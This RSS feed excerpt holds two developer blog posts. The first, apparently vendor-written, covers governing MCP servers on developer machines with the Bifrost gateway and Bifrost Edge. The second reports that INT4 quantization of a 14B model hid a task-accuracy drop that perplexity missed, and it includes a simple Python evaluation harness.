&lt;p&gt;MCP servers on developer machines are hard to govern because they are configured separately inside each app, on each machine, and by each person, which keeps them outside any central inventory. A server added to a coding agent on one engineer's machine is unknown to everyone else, and the configuration can change after anyone reviews it. Check Point Research demonstrated this in 2025 with a flaw in Cursor: once a user approved an MCP configuration, the IDE did not re-validate it, so an attacker could land a harmless config in a shared repository, wait for approval, and later swap in a command that ran on every subsequent launch. The issue was fixed in a later Cursor release, but the pattern it exposed is general.&lt;/p&gt;

&lt;p&gt;The supply chain underneath these servers is an equally serious problem. In April 2026, OX Security disclosed a &lt;a href="https://thehackernews.com/2026/04/anthropic-mcp-design-vulnerability.html" rel="noopener noreferrer"&gt;command execution weakness&lt;/a&gt; in the standard input and output transport of the official MCP software development kit, present across every major language version and affecting thousands of publicly reachable servers, a reminder that one design default in a widely used component propagates to every project built on it. A control that depends on reviewing each server by hand cannot keep up with that volume or that rate of change.&lt;/p&gt;

&lt;h2&gt;
  
  
  Why existing controls miss them
&lt;/h2&gt;

&lt;p&gt;Traditional controls miss MCP servers because they were built for a different shape of traffic. Network proxies and data loss prevention systems inspect what crosses the corporate network, yet a local MCP server can run entirely on the laptop over standard input and output, with nothing for the network to intercept. API gateways and web application firewalls assume predictable, developer-defined requests, so they cannot validate an agent's identity or judge whether a given tool call is appropriate in context. Blocklists depend on a known list of destinations, and with thousands of servers in circulation and new vulnerabilities disclosed almost weekly, no list keeps pace. Written policy states what engineers should do, but a document does not stop a tool call at the moment it runs.&lt;/p&gt;

&lt;p&gt;Two facts follow from this: MCP servers are configured on the endpoint, so visibility and enforcement of which servers exist have to happen on the endpoint as well; and because the tool calls themselves run through whatever connects the agent to the server, controlling how an approved server is used belongs at a gateway that every call passes through.&lt;/p&gt;

&lt;h2&gt;
  
  
  How the Bifrost AI gateway and Bifrost Edge govern MCP servers
&lt;/h2&gt;

&lt;p&gt;Governing MCP servers well takes the same two layers that govern any AI traffic: a place to define and enforce policy, and a way to apply that policy on every machine. Bifrost, the &lt;a href="https://github.com/maximhq/bifrost" rel="noopener noreferrer"&gt;open-source AI gateway&lt;/a&gt; built by Maxim AI, is also an &lt;a href="https://docs.getbifrost.ai/mcp/overview" rel="noopener noreferrer"&gt;MCP gateway&lt;/a&gt;, so approved MCP servers connect through it, and it controls which tools each request can use and records every call. &lt;a href="https://docs.getbifrost.ai/edge/overview" rel="noopener noreferrer"&gt;Bifrost Edge&lt;/a&gt; extends that control to the endpoint, where the servers are actually configured.&lt;/p&gt;

&lt;p&gt;The two layers cover the two halves of the problem. Edge identifies which MCP servers exist on the fleet and blocks the ones that are not allowed, and the gateway governs how the approved servers are used, down to the individual tool and the individual person.&lt;/p&gt;

&lt;h3&gt;
  
  
  See every MCP server across the fleet
&lt;/h3&gt;

&lt;p&gt;&lt;a href="https://docs.getbifrost.ai/edge/mcp-governance" rel="noopener noreferrer"&gt;Bifrost Edge inventories the MCP servers&lt;/a&gt; configured inside each AI app on every machine and builds a live inventory of which servers are present, on which apps, and across how many devices. For many organizations this is the first complete answer to a basic question about which MCP servers are actually running on the fleet, replacing guesswork with real data. MCP discovery covers the &lt;a href="https://docs.getbifrost.ai/edge/supported-applications" rel="noopener noreferrer"&gt;AI apps that support the protocol&lt;/a&gt; today, including Claude Code, Claude Desktop, Gemini CLI, OpenCode, Codex, and Cursor.&lt;/p&gt;

&lt;h3&gt;
  
  
  Allow or deny each server, enforced on the device
&lt;/h3&gt;

&lt;p&gt;Once the inventory exists, administrators allow or deny each MCP server individually, and Edge enforces that decision on the machine, even for an app that had the server configured before the policy existed. When Edge detects a server it has not seen, it raises a pending approval in the admin console, where administrators decide whether new servers stay allowed or blocked while a decision is open. A denied server cannot be used, rather than being discouraged by a policy no one enforces.&lt;/p&gt;

&lt;h3&gt;
  
  
  Control which tools each person can call
&lt;/h3&gt;

&lt;p&gt;On the gateway, &lt;a href="https://docs.getbifrost.ai/features/governance/mcp-tools" rel="noopener noreferrer"&gt;MCP tool filtering&lt;/a&gt; decides which tools an approved server actually exposes, per virtual key. The starting point is deny by default, so a virtual key with no MCP configuration receives no tools, and an administrator builds an explicit list of the approved clients and tools each key may use. &lt;a href="https://docs.getbifrost.ai/mcp/auth/per-user-oauth" rel="noopener noreferrer"&gt;Per-user OAuth&lt;/a&gt; then ties each upstream connection to the individual using it, so a person's tool calls run under their own scoped credentials instead of a single shared token that grants the same broad access to everyone.&lt;/p&gt;

&lt;h3&gt;
  
  
  Keep an audit trail of every tool call
&lt;/h3&gt;

&lt;p&gt;Because approved MCP traffic flows through Bifrost, every tool call is recorded with the identity behind it, what was called, and what came back. That record turns an agent action from an unattributable event into something a security or compliance team can review, which is exactly what the scattered, machine-by-machine setup made impossible before. Edge reaches every machine through the &lt;a href="https://docs.getbifrost.ai/edge/deployment-mdm" rel="noopener noreferrer"&gt;device management platform&lt;/a&gt; an organization already runs, so the inventory and the enforcement apply across the fleet rather than to whichever laptops happened to opt in.&lt;/p&gt;

&lt;h2&gt;
  
  
  Common questions about MCP server security
&lt;/h2&gt;

&lt;h3&gt;
  
  
  What is an MCP server?
&lt;/h3&gt;

&lt;p&gt;An MCP server is a program that gives an AI model access to specific tools, data, or actions through the Model Context Protocol. A coding agent might use one MCP server to read a repository, another to query a database, and another to file an issue, with each server defining what the model is allowed to do.&lt;/p&gt;

&lt;h3&gt;
  
  
  Are MCP servers a security risk?
&lt;/h3&gt;

&lt;p&gt;MCP servers are a security risk when they run without oversight, because they grant AI models real access to internal systems and often hold broad, long-lived credentials. The risk lies not in the protocol itself but in ungoverned use, meaning servers configured on individual machines, with access no one reviewed and tool calls no one can see.&lt;/p&gt;

&lt;h3&gt;
  
  
  How do you govern MCP servers across an organization?
&lt;/h3&gt;

&lt;p&gt;Governing MCP servers across an organization takes both visibility and enforcement. An endpoint layer such as Bifrost Edge inventories the servers configured on every machine and enforces which ones are allowed, while an MCP gateway such as Bifrost controls which tools each person can call and records every call for audit.&lt;/p&gt;

&lt;h2&gt;
  
  
  Where this leaves engineering and security teams
&lt;/h2&gt;

&lt;p&gt;MCP servers are now part of how software gets built, and that is not going to reverse. The teams that stay ahead of the risk treat it as a visibility problem first and an enforcement problem second, governing servers where they are configured and where their tool calls run rather than trusting that a policy document will hold.&lt;/p&gt;

&lt;p&gt;Pairing the Bifrost AI gateway with Bifrost Edge covers both halves: the gateway controls which tools each person can use and logs every call, and Edge, currently in alpha, brings every MCP server on every machine into one inventory with enforcement on the device. Teams weighing the risk of ungoverned MCP servers can see how the combined approach works on the &lt;a href="https://docs.getbifrost.ai/edge/overview" rel="noopener noreferrer"&gt;Bifrost Edge overview&lt;/a&gt; and register there for alpha access.&lt;/p&gt;

</description>
    </item>
    <item>
      <title>Perplexity held flat after INT4. Task accuracy dropped 7 points.</title>
      <dc:creator>Marcus Chen</dc:creator>
      <pubDate>Fri, 19 Jun 2026 06:39:22 +0000</pubDate>
      <link>https://dev.to/marcuswwchen/perplexity-held-flat-after-int4-task-accuracy-dropped-7-points-4fg6</link>
      <guid>https://dev.to/marcuswwchen/perplexity-held-flat-after-int4-task-accuracy-dropped-7-points-4fg6</guid>
      <description>&lt;p&gt;&lt;strong&gt;TL;DR: We quantized a fine-tuned 14B agent model to INT4 with GPTQ. Perplexity moved 0.04. We almost shipped it. A domain eval suite caught a 7-point drop in multi-step task completion that perplexity never saw. Perplexity is a terrible acceptance gate for quantized models.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;We run model fine-tuning and eval for enterprise agent automation at Nexus Labs. Series B, small team, ten people who touch the eval pipeline. The model in question was a Qwen2.5-14B fine-tune we use for structured workflow execution. Customer-facing. It matters when it's wrong.&lt;/p&gt;

&lt;p&gt;The plan was boring. Quantize to INT4 to fit two replicas on one A100 instead of one, cut serving cost roughly in half. Standard move. We picked GPTQ with a 128 group size, ran calibration on 512 samples from our training distribution, and measured perplexity before and after.&lt;/p&gt;

&lt;h2&gt;
  
  
  The number that lied
&lt;/h2&gt;

&lt;p&gt;Perplexity on our held-out set: 3.81 full precision, 3.85 after INT4. That's a 1% move. Nothing. By the old folklore, a quantization that holds perplexity is a quantization you ship.&lt;/p&gt;

&lt;p&gt;So we ran the actual eval suite. Not perplexity. The 340-case adversarial set we built for this product, where each case is a multi-step task with a programmatic pass/fail check on the final state.&lt;/p&gt;

&lt;p&gt;Task completion went from 81.2% to 74.1%. Seven points. On a metric customers feel directly.&lt;/p&gt;

&lt;p&gt;The failures clustered. Long sequences, six steps or more, where the model had to hold a constraint from step one and apply it at step five. The INT4 model dropped the constraint. Perplexity averages token-level surprise across the whole corpus, so a few critical tokens going wrong in a 400-token trajectory barely move the mean. The eval that scores the trajectory outcome sees it immediately.&lt;/p&gt;

&lt;p&gt;Here is roughly what we measured across the gates:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Metric&lt;/th&gt;
&lt;th&gt;FP16&lt;/th&gt;
&lt;th&gt;INT4 (GPTQ)&lt;/th&gt;
&lt;th&gt;Delta&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Perplexity (held-out)&lt;/td&gt;
&lt;td&gt;3.81&lt;/td&gt;
&lt;td&gt;3.85&lt;/td&gt;
&lt;td&gt;+0.04&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;MMLU (5-shot)&lt;/td&gt;
&lt;td&gt;71.4%&lt;/td&gt;
&lt;td&gt;70.9%&lt;/td&gt;
&lt;td&gt;-0.5&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Task completion (our suite)&lt;/td&gt;
&lt;td&gt;81.2%&lt;/td&gt;
&lt;td&gt;74.1%&lt;/td&gt;
&lt;td&gt;-7.1&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Constraint-retention subset&lt;/td&gt;
&lt;td&gt;88%&lt;/td&gt;
&lt;td&gt;69%&lt;/td&gt;
&lt;td&gt;-19&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;MMLU barely moved either. Generic benchmarks were as blind as perplexity here. The damage was concentrated in exactly the capability our product depends on, and only the domain suite measured it.&lt;/p&gt;

&lt;h2&gt;
  
  
  Why averaged metrics miss this
&lt;/h2&gt;

&lt;p&gt;Quantization error isn't uniform. INT4 rounds weights into buckets, and the layers that handle long-range dependency, attention projections deep in the stack, take the error worst. A model can stay fluent token-to-token while losing the thread across a long context. Fluency is what perplexity rewards. Following a constraint across 400 tokens is not fluency.&lt;/p&gt;

&lt;p&gt;The lesson we keep relearning. The model is the easy part. The thing that tells you whether the model is good enough is the hard part, and it's almost never a single scalar.&lt;/p&gt;

&lt;h2&gt;
  
  
  What we changed
&lt;/h2&gt;

&lt;p&gt;We made the domain suite a hard gate for any inference-level change. Quantization, a vLLM version bump, a new kernel, all of it has to clear the trajectory eval, not perplexity.&lt;/p&gt;

&lt;p&gt;To get clean comparisons we shadow every eval case against two backends at once: the FP16 reference on one endpoint and the candidate INT4 build on another. We route both through Bifrost, our gateway, so the eval harness sends one OpenAI-format request and we fan it to both backends behind the same interface. That removed a class of bugs where prompt formatting drifted between the two test paths and made the diff look bigger than it was.&lt;/p&gt;

&lt;p&gt;The harness itself is dull on purpose:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;asyncio&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;httpx&lt;/span&gt;

&lt;span class="n"&gt;GATEWAY&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;http://localhost:8080/v1/chat/completions&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;

&lt;span class="k"&gt;async&lt;/span&gt; &lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;run_case&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;client&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;model&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;case&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="n"&gt;state&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;case&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;initial_state&lt;/span&gt;
    &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;step&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;case&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;steps&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="n"&gt;r&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;await&lt;/span&gt; &lt;span class="n"&gt;client&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;post&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;GATEWAY&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;json&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;model&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;model&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;                 &lt;span class="c1"&gt;# "ref/qwen-fp16" or "cand/qwen-int4"
&lt;/span&gt;            &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;messages&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;case&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;render&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;state&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
            &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;temperature&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="p"&gt;})&lt;/span&gt;
        &lt;span class="n"&gt;state&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;case&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;apply&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;state&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;r&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;json&lt;/span&gt;&lt;span class="p"&gt;())&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;case&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;check&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;state&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;               &lt;span class="c1"&gt;# programmatic pass/fail
&lt;/span&gt;
&lt;span class="k"&gt;async&lt;/span&gt; &lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;eval_suite&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;model&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;cases&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="k"&gt;async&lt;/span&gt; &lt;span class="k"&gt;with&lt;/span&gt; &lt;span class="n"&gt;httpx&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nc"&gt;AsyncClient&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;timeout&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;60&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;as&lt;/span&gt; &lt;span class="n"&gt;c&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="n"&gt;results&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;await&lt;/span&gt; &lt;span class="n"&gt;asyncio&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;gather&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nf"&gt;run_case&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;c&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;model&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;x&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;x&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;cases&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nf"&gt;sum&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;results&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;/&lt;/span&gt; &lt;span class="nf"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;results&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Temperature 0, deterministic check, no LLM judging the output. The check is code that inspects final state. When the pass criterion is itself fuzzy, you can't tell a quantization regression from judge noise, and we'd already been burned by that.&lt;/p&gt;

&lt;p&gt;We didn't abandon INT4. We re-ran with AWQ instead of GPTQ and bumped calibration to 1,024 samples weighted toward long sequences. That landed at 79.3% task completion. Still down from FP16, but inside our 2-point tolerance, so we shipped it with the cost win mostly intact.&lt;/p&gt;

&lt;h2&gt;
  
  
  Trade-offs and limitations
&lt;/h2&gt;

&lt;p&gt;A 340-case trajectory suite is expensive. Each full run is about 11 minutes and real GPU time. Perplexity is seconds. We only afford the suite because we gate on it for releases, not every commit.&lt;/p&gt;

&lt;p&gt;This finding is ours, not a law. A model serving short single-turn responses would likely show almost no gap between perplexity and task metrics, because there's no long-range constraint to lose. The wider the gap between your token-level proxy and your actual product behavior, the more this bites.&lt;/p&gt;

&lt;p&gt;Deterministic checks only work when success is checkable in code. Plenty of generation tasks aren't, and there you're stuck with judge models and their variance. We don't pretend INT4 is free either. It cost us 2 points we chose to pay for the throughput.&lt;/p&gt;

&lt;p&gt;And calibration data matters more than the algorithm. Switching GPTQ to AWQ helped, but reweighting calibration toward long sequences helped more.&lt;/p&gt;

&lt;h2&gt;
  
  
  Further Reading
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://arxiv.org/abs/2210.17323" rel="noopener noreferrer"&gt;GPTQ paper (Frantar et al.)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://arxiv.org/abs/2306.00978" rel="noopener noreferrer"&gt;AWQ: Activation-aware Weight Quantization&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://docs.vllm.ai/en/latest/quantization/supported_hardware.html" rel="noopener noreferrer"&gt;vLLM quantization docs&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/maximhq/bifrost" rel="noopener noreferrer"&gt;Bifrost AI gateway&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://huggingface.co/docs/transformers/main/en/quantization/overview" rel="noopener noreferrer"&gt;Hugging Face quantization guide&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>machinelearning</category>
      <category>llm</category>
      <category>mlops</category>
      <category>pytorch</category>
    </item>
  </channel>
</rss>
